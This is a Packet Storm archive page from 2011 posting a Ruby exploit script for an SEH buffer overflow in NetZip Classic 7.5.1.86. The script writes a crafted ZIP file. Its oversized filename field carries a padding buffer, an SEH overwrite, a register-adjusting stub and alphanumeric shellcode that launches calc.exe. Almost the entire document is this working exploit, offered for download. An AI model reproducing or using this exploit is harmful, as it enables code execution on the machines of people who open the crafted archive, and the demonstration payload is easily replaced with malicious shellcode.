exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

NetZip Classic Buffer Overflow

NetZip Classic Buffer Overflow
Posted Jan 31, 2011
Authored by C4SS!0 G0M3S

NetZip Classic version 7.5.1.86 suffers from a buffer overflow vulnerability.

tags | exploit, overflow
SHA-256 | b462ddd12de0e26eed6e4e503299b62039e811a935a0515a698eae884565b327

NetZip Classic Buffer Overflow

Change Mirror Download
#
#
#[+]Exploit Title: Exploit Buffer Overflow NetZip Classic(SEH)
#[+]Date: 01\30\\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://proforma.real.com/real/nzclassic/nzclassic.html
#[+]Version: 7.5.1.86
#[+]Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN
#[+]CVE: N/A
#
#The structure of the zip file has been copied from the exploit CORELAN TEAM.
#Thanks For all Turuial Corelan Team
#
#Created BY C4SS!0 G0M3S
#WWW.INVASAO.COM.BR
#Louredo_@hotmail.com
#
#

def usage()
system("cls")
system("color 4f");
str =
"""


####### # ###### ###### # #############
# ## # # # # #
# # # # # # # #
# ###### ###### ###### # # #
# # # # # # #
# # # # # # #
####### # ###### ###### 0 #############


[+]Exploit Buffer Overlfow NetZip Classic 7.5.1.86

[+]Author C4SS!0 G0M3S

[+]E-mail Louredo_@hotmail.com


"""
print str
end
if ARGV.length !=1
usage()
print "[-]Usage: "+$0+" <File Name>\n"
print "[-]Exemple: "+$0+" Exploit.zip\n"
exit
end
usage()
filename = ARGV[0]
head1 =
"\x50\x4B\x03\x04\x14\x00\x00"+
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\xe4\x0f" +
"\x00\x00\x00";

head2 =
"\x50\x4B\x01\x02\x14\x00\x14"+
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\xe4\x0f"+
"\x00\x00\x00\x00\x00\x00\x01\x00"+
"\x24\x00\x00\x00\x00\x00\x00\x00";

end1 =
"\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"+
"\x12\x10\x00\x00"+
"\x02\x10\x00\x00"+
"\x00\x00";

buffer = "\x41" * 235
nseh = "\x59\x40\x40\x40"
seh = [0x10057A41].pack('V')#
egg = "\x41" * 5 #4 INC ECX
egg += "\x61" * 6 #6 POPAD
egg += "\x04\x10" #ADD AL,10
egg += "\x98\xd1" #CALL EAX
egg += "\x41" * 5 #JUNK TO SHELLCODE
puts " [*]Identifying the length Shellcode\n\n"
sleep(1)
shellcode =
"PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIYKIPVQXIOO3L5FBPXLN9D"+
"46DJTNQ5N0XVQD84XK3M8KL33RXE8L4MUP02XOLSUO92XOFVCKEL3X4NNSM5RNJGJP2ELOOSRJM5M64X"+ #Shellcode WinExec("calc",0)
"USVQ9WQKWLVSPJUT1XJDFWEZUB4O7SLKKUKUURKZP179M1XKMWRP8EKI2M8YSZW7KCJ8OPL0O7SHSPSY"+ #ALPHA BASEADDRESS EAX
"41GL7XXWKLCLNK35O0WQCSTPQY1VSXML5O6L5IQCNMHJUNJL1UUOX7VMIWMWK9PXYKN0QE1OFTNVOMUT"+
"YK7OGT8FOPYLP3K8W5UCOM83KYZA"

puts " [*]The length is Shellcode: #{shellcode.length}\n\n"
sleep(1)


junk = "\x41" * (4064 - (buffer+nseh+seh+egg+shellcode).length)

payload = buffer+nseh+seh+egg+shellcode+junk

payload += ".txt"

exploit_zip = head1+payload+head2+payload+end1
puts " [*]Creating the File #{filename}\n\n"
sleep(1)
begin

f = File.open(filename,"w")
f.puts exploit_zip
f.close
puts " [*]The File #{filename} was Created with Success\n\n"
sleep(1)
rescue

puts " [*]Error When Creating The File #{filename}\n\n"
exit

end

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close